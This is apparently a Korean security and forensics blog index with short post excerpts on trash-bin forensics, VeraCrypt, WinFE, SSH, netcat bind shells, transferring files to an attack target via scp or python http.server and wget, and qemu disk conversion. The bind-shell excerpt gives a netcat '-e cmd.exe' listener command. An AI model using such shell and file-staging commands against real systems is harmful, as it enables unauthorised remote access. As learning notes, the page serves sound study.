모두의 dream

* 직접 실험을 하며 작성한 내용으로 틀린 내용이 매우매우 있을 수 있음. (직접 분석시 케이스 참고용으로만 사용할 것.)I. 휴지통 분석baseball.jpg 는 shift+delete, Flag_of_South_Korea.svg.png는 휴지통으로 집어넣은 후 삭제했다. 휴지통에 있는 파일은 삭제된 파일이라고 보기는 어렵지만.. 아무튼 별도의 포스팅을 할 정도는 아니라 여기에 작성했다.휴지통 삭제Ext4 파일시스템을 사용하는 우분투에서는 다음 경로에 삭제된 파일이 저장된다. (휴지통)~/.local/share/Trash/files(Ext4를 사용하는 모든 운영체제가 동일하다고 볼 순 없다.)삭제된 파일을 복원할 때 원래 있던 경로를 확인하는 방법 무엇일까?다음 경로에 파일의 원래 경로를 저장해 놓고 ..

VeraCrypt기존 파티션이나 드라이브(USB, 외장하드)를 암호화 하거나 암호화된 가상 디스크를 파일 형태로 새롭게 생성한다. VeraCrypt에는 3가지 볼륨 생성 옵션, 2가지 볼륨 형태가 존재한다.볼륨 생성 옵션 (Volume Creation)1. Create an encrypted file container암호화된 가상 디스크를 파일 형태로 생성한다.2. Encrypt a non-system partition/drive운영체제가 설치되지 않은 파티션이나 드라이브(외장 하드, USB 등)를 암호화하는 옵션.기존 데이터는 삭제되는 포맷을 한 후 암호화된 볼륨을 생성 하거나, 기존 데이터를 함께 암호화를 하는 옵션 중 선택할 수 있다.3. Encrypt the system partition or e..

WinFE (Windows Forensic Environment)부팅 USB를 이용하여 별도의 OS로 컴퓨터를 실행시킨 후 장착되어 있는 저장매체를 대상으로 이미징을 진행할 수 있다. 사용하는 프로그램은 WinFE(Windows Forensic Environment) 프로그램이다. WinFE는 경량 운영체제 WinPE(Windows Preinstallation Environment)를 기반으로 동작하는 운영체제로 디지털 포렌식에 초점을 맞추고 있기 때문에 쓰기 방지 등을 지원한다. 설치 과정은 공식 매뉴얼을 그대로 따라하면 된다.1. WinFE 다운로드 & 압축해제WinFE의 바탕화면을 변경하고 싶다면 wallpaper.jpg 라는 이름으로 "\x86", "\x64" 폴더에 복사하면 된다.2. Windo..

SSH (Secure Shell)보호되지 않는 네트워크를 통해 컴퓨터에 연결할 때 안전한 연결이 가능하도록 하는 네트워크 프로토콜. 원격 시스템에 액세스할 때 데이터의 기밀성과 무결성을 유지하는데 필수적임.작동 방식언젠간 공부하지 않을까요~SSH 활성화user@user-None:~$ sudo service ssh startuser@user-None:~$ service ssh status● ssh.service - OpenBSD Secure Shell server Loaded: loaded (/lib/systemd/system/ssh.service; disabled; preset: enabled) Drop-In: /etc/systemd/system/ssh.service.d ..

보호되어 있는 글입니다.

1. Bind Shell서버(접속 대상)가 포트를 열면 클라이언트(접속자)가 접속하여 쉘을 여는 방법. Bind Shell 을 여는 방법은 다음과 같다.서버 (접속 대상)C:\Users\user\Downloads>nc64.exe -lp 31337 -e cmd.exe 옵션 -l: listen 모드로 포트를 열어줌. -p: 포트 지정. -v: verbosity 증가, 더 많은 정보를 보여줌. -e: 접속 후 실행될 명령어 지정.클라이언트 (접속자)C:\Users\user\Downloads>nc64.exe 127.0.0.1 31337 Microsoft Windows [Version 10.0.19045.4412] (c) Microsoft Corporation. All rights reserved. C:\User..

공격 대상 서버에 파일을 옮기는 방법에 대해 작성해봤다.I. SCP (Secure Copy)원격지에 있는 파일을 전송하거나 가져올때 사용하는 파일 전송 프로토콜.원격지scp @:예시scp ./nmap root@10.10.110.100:/tmp옵션-P : 포트번호를 지정함-p : 원본파일 수정/사용시간 및 권한을 유지함-r : 하위 디렉토리 및 파일 모두 복사함II. 웹 서버 열기파이썬3의 http.server 모듈을 이용해서 서버를 연 후 wget을 이용해서 파일을 다운로드 한다.원격지 명령어 (파일이 있는 디렉토리에서 실행해야 됨)python3 -m http.server 8000옵션-m: 특정 모듈을 스크립트처럼 실행시키도록 해줌.대상 서버 명령어wget http://10.10.14.2:8000/nmap

포렌식을 하다보면 이미지 파일을 가상머신에서 직접 실행해봐야 되는 경우가 발생한다.따라서 이미지 파일을 vmdk, vhdx 등 가상머신 확장자로 변환해줘야 한다.1. 이미지 파일 가상머신 확장자로 변환Qemu 이용qemu-img convert -pO [원하는 파일형식] [이미지 파일 경로] [원하는 파일명과 경로.확장자] 예시qemu-img convert -pO vmdk /mnt/c/Users/user/Desktop/Study/Ext4/Ext4_img_2.001 /mnt/c/Users/user/Desktop/Study/Ext4/Ext4.vmdk VMware 는 vmdk 파일, Hyper-V는 vhdx 로 변환해주면 된다. (O 옵션이 Output format, p 옵션이 Progress 옵션이다.)Vir..